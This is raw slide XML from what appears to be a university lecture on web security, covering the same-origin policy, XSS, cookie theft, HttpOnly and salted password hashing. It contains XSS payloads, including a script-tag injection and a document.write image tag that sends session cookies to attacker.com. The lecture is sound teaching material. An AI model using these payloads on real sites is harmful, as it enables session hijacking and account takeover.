              <a:t>Put the recipient as ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Yeongjin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>jang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Send $1,000,000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browser will use the stored cookie to connect to there…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What if the user has been logged in to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>some_bank_website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SEND MONEY to YEONGJIN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F0BB0-0068-7CCD-7F5E-B003A6F9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66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1C18-C554-7CA4-672F-AFEFBB10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Policy:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Blocking Naïve Code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FAFB-1EFD-A433-CDD9-3F04BF9BA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Naïve Code Injection might be too dangerous</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If we get to anyone’s homepage, then they can put such a code, and make our web browser do whatever they want via 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Same-Origin Policy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Problem: I connected to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>attack.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, but why does </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>attack.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> accesses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>some_bank_website.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>facebook.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> or others??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Policy: restrict </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to send HTTP request only to the same domain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attack.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> can send request to *.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>attack.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> but 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some_bank_website.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>wellsfargo.com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B6AF1-F638-D901-8D00-C63A6A9A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01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1C18-C554-7CA4-672F-AFEFBB10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EFAFB-1EFD-A433-CDD9-3F04BF9BA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B6AF1-F638-D901-8D00-C63A6A9A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D6C081-188F-C8C4-15B9-28FA1D055E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90435"/>
            <a:ext cx="7772400" cy="15753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063155-A89D-55DF-ECF5-20B2FC1058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271" y="3078550"/>
            <a:ext cx="6493329" cy="37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87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32FE-B64D-2A3F-0949-45794A4F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Hijack Sessions via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>XMLHttpRequest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9C99-5A35-42EE-C53E-24B29B66B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Same-Origin Policy blocks the use of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>XMLHttpRequest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Is there any way that</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We can inject </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To the same domain of the target??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YES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7C564-BC34-53C0-304E-CC13DFBF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20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32FE-B64D-2A3F-0949-45794A4F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Injection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39C99-5A35-42EE-C53E-24B29B66B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Facebook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7C564-BC34-53C0-304E-CC13DFBF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0D06DA4-5B2D-1214-EC48-2566268E8E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5107" y="2361353"/>
            <a:ext cx="7772400" cy="1639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3EE23-3689-D766-EA81-A0A25E3F1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61" y="4136231"/>
            <a:ext cx="9937477" cy="727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8DD9D7-AA84-1829-5833-D1557B660C36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3058886" y="4920230"/>
            <a:ext cx="5774871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happens if the comment is:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;script&gt;alert(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>);&lt;/script&gt;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9754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70C2-BC23-98B5-21D0-68A9069A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46ECC-BD63-7A57-60F7-FD572E4E6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malicious comment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Break double quotes and put the script tag on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5AC2-016A-7357-9D51-94046A94A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4ED42-EA6E-5F5D-A088-F48A3FA915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271" y="2276021"/>
            <a:ext cx="7772400" cy="62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339C0-E20D-4D76-B3DE-CC2C0746ED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271" y="3957833"/>
            <a:ext cx="7772400" cy="57396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F6ACA9B-AC02-F0DE-2264-79C91B389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0" y="4673600"/>
            <a:ext cx="54991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4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B836-73B5-F32B-467D-86EFD5FF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Password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34D8-3BED-3AD4-2233-9EA63567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ID/password but the server stores hash of the password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0305-7D0A-548D-226C-57C03968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Apps internet web browser Icon | Oxygen Iconset | Oxygen Team">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4FB5DA24-3F51-E08A-4A08-F8F92F7E7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4879" y="4488997"/>
            <a:ext cx="1613807" cy="16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What is a Web Server and What is it used for? – Lizzie's Website">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C217812E-46D4-BC3D-AC58-C6E62A599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7150" y="3733800"/>
            <a:ext cx="2603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425050-48E2-3778-5128-752F5B487019}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2728686" y="5204725"/>
            <a:ext cx="6088743" cy="369"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="41275">
            <a:solidFill>
              <a:srgbClr val="000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616E6D-BF64-A3B0-2968-99226C50A679}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4342493" y="5204725"/>
            <a:ext cx="25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Protected by TLS (HTTPS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="Database - Free technology icons">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{112248A0-9809-A915-6C5A-6AD75BFB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2379" y="2251876"/>
            <a:ext cx="1475475" cy="14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ED2FF-AD4A-9460-E9FC-B2D0137B48AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1579601" y="2337830"/>
            <a:ext cx="838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blue9057:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> 59636881ab9bf34263cf3f4d90f25d2b91e74e8804b802d25c8f4bc5c80846ee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1CFB3D-D5A5-5789-8777-DF15C2BEFE11}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4119665"/>
            <a:ext cx="445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blue9057:my-super-secure-password!@#$11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E558D-D19E-8E12-B83B-AB5FB9887FDB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2813236" y="5739567"/>
            <a:ext cx="7556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SHA256(“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>some_secret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>” + “my-super-secure-password!@#$11”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>59636881ab9bf34263cf3f4d90f25d2b91e74e8804b802d25c8f4bc5c80846ee</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/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F1A995-9B6F-A5D1-555D-87E38E00354B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="10" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5773057" y="2707162"/>
            <a:ext cx="1106990" cy="3395642"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/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8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685 0 " pathEditMode="relative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AD63-B285-FBFD-8FC6-760A7144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Injection, What Attackers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F1BD-04E5-A00A-0131-30A296E19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They can virtually do anything the user can do</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You can analyze webpage content using functions such as</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Document.getElementById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getFirstChild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getParent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Etc..</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Find input field, put a photo, and make a post</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Such things are already done in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We just need to make some function calls to do so</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Why Can’t Same-Origin Policy Block this?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> runs on the same domain (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>facebook.com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27D92-6EBF-790F-B390-8714FF00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9B7F958-4ED2-8E89-6EA5-EB952CF0F3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732" y="3429000"/>
            <a:ext cx="4190267" cy="16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9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AA85-DFB9-7002-4959-FA79DC79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The Example Facebook Attack</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Does not Work for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88423-9E88-2099-9087-901827AE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Facebook.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> or other websites are serious about these attacks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0175-8840-AA5B-DA3F-365981A8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C814B26-3225-C7F7-C1EF-E3D688FE7B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91581"/>
            <a:ext cx="7772400" cy="3019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E5018-61F0-D754-F584-2600F7597F9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2220686" y="2710544"/>
            <a:ext cx="702128" cy="24492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CDCC9F-3C41-7563-1D9F-73BB71CC633F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600201" y="2531895"/>
            <a:ext cx="2024743" cy="21130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CFD328-CF64-E337-172A-581A78FE32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843" y="5483225"/>
            <a:ext cx="77724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0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AA85-DFB9-7002-4959-FA79DC79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The Example Facebook Attack</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Does not Work for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88423-9E88-2099-9087-901827AE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Defeating attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web frameworks are providing input sanitizers to kill all the HTML tags</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Having a text-only area to present text: injected string can never be interpreted as a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>But there could be some cases, please try to find one and win the bounty</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Make sure you test your potential attacks with your own account</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DO NOT harm other users/systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Read about details: https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>www.facebook.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>whitehat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/info/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0175-8840-AA5B-DA3F-365981A8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89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BACA-1A72-AB3B-DCE3-DA5E37D8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You Can Have Cookie</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How Can You Send that to the Attacker?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FB53B-C7B7-C225-39FA-E9093833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After injecting the code, attacker may access the cookie via</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>document.cookie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 use that, attacker may want to have the cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Then, how can we transfer that cookie to the attacker?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacker has a server to receive the cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://attacker.com/?cookie=session=8e5f8693-9983-d3fd-939849239482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XMLHttpRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in Web 2.0?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No way; the Same-Origin policy will block that</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>attacker.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> != </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>facebook.com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03E59-E75E-5531-1886-0F0D4BC7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05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FB29-5FB5-06F6-C609-B64D0ABF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Document Has a URL that</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Browser Automatically Connects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DFCAC-F09B-BB82-3892-FBF5069C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9629" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Access cs370.unexploitable.systems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images included in the HTML file, web browsers are automatically fetching that when the HTML load finishes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What if we add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=https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>attacker.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/?cookie=239893284-239823-32832-2323 /&gt;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CE449-2D56-2D86-5AB8-D84436CAC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20593C3-5D0A-0F34-CD9A-D4050BBBF1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529" y="1576782"/>
            <a:ext cx="1914116" cy="1639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93DAB-C0D8-D14F-E4B3-4DBCA790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86" y="2432957"/>
            <a:ext cx="6680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89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5982-E1D8-FD9C-115E-2499ED8B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document.write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7B32-78D1-CE13-68B2-CE9C56C03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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> function that you can write tags on the page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>E.g.,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>document.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(‘&lt;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hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://attacker.com/?cookie=session=8e5f8693-9983-d3fd-939849239482</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> /&gt;’);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This will create a beautiful image tag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Loading will be failed, but it will at least send the request to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1950A-4D79-98DB-4EC4-9AB50809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3C87AC8-8C7C-9C85-FE05-A71EC65A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4882357"/>
            <a:ext cx="697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24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EDA4-3C58-6A53-6C4C-D9B5E2F4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Blocks </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>XMLHttpReqeust</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> but not &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt; tags..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9B14B-B779-D679-1DBA-6743D1835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cannot run POST or other requests using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>XMLHttpRequest</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Because the Same-Origin Policy blocks it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Instead, we can send any kind of GET requests using &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt; tags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Attackers may steal the cookie in this manner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F5A43-97FC-EEA4-E7ED-C88BBD2E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3391AD8-B135-A3AF-938E-C0CC1C1D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07" y="3657714"/>
            <a:ext cx="69723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68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ABFDB-7DEB-5B94-C55F-D2614C99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Httponly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Cookie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B5834-6DD7-362D-69B6-9088A31E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7986" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Once an attacker run a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> code, Cookie stealing might be too easy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>One &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt; tag will break the Same-Origin Policy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Protection: Do not let </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> access sensitive cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>HttpOnly</a:t>
            </a:r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This directive indicates that the cookie is hidden from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Only shows on the HTTP protocol (in the header)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8E745-560E-DFAC-A5EA-37639F42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C59C4-3ED6-8F1F-8189-BAA81CA1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7" y="4020792"/>
            <a:ext cx="7772400" cy="223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E96B73-D713-D337-A555-8B9156AD75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7" y="5139491"/>
            <a:ext cx="7772400" cy="75144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0D32406A-950B-CC53-8F47-7BDC98BDD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5280263"/>
            <a:ext cx="2057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82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80B6-B8E5-01DD-670C-CD891D46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E639B-60D3-98C5-BD8A-EE5EBC653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user provides username/password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The server can match that with the DB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If passed, the server will create a session and store login info</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server will issue a cookie to the client to find the session for following requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If stolen, the attacker may hijack the victim user’s session</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>i.e., The attacker can use logged-in of the user!!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A0E8-C5A1-6FA6-5BF9-34B17D24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58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80B6-B8E5-01DD-670C-CD891D46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E639B-60D3-98C5-BD8A-EE5EBC653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not sanitized/guarded correctly, attackers can inject </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> code to the website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If injected, attackers can do whatever user can do</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>They can even access </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can send the cookie to the attacker via &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt; tag injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bypassing the Same-Origin Policy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To defeat such a session hijacking attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We use ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>HttpOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’ directive in issuing the cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cookie will not be shown in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Javascript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A0E8-C5A1-6FA6-5BF9-34B17D24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6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2E67-4048-45DE-E8E2-87680B01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5308D-D6A5-AADC-93A8-5554C90B2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submits ID and password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Query database to find a pair of</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(Username, SHA256(secret + password))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
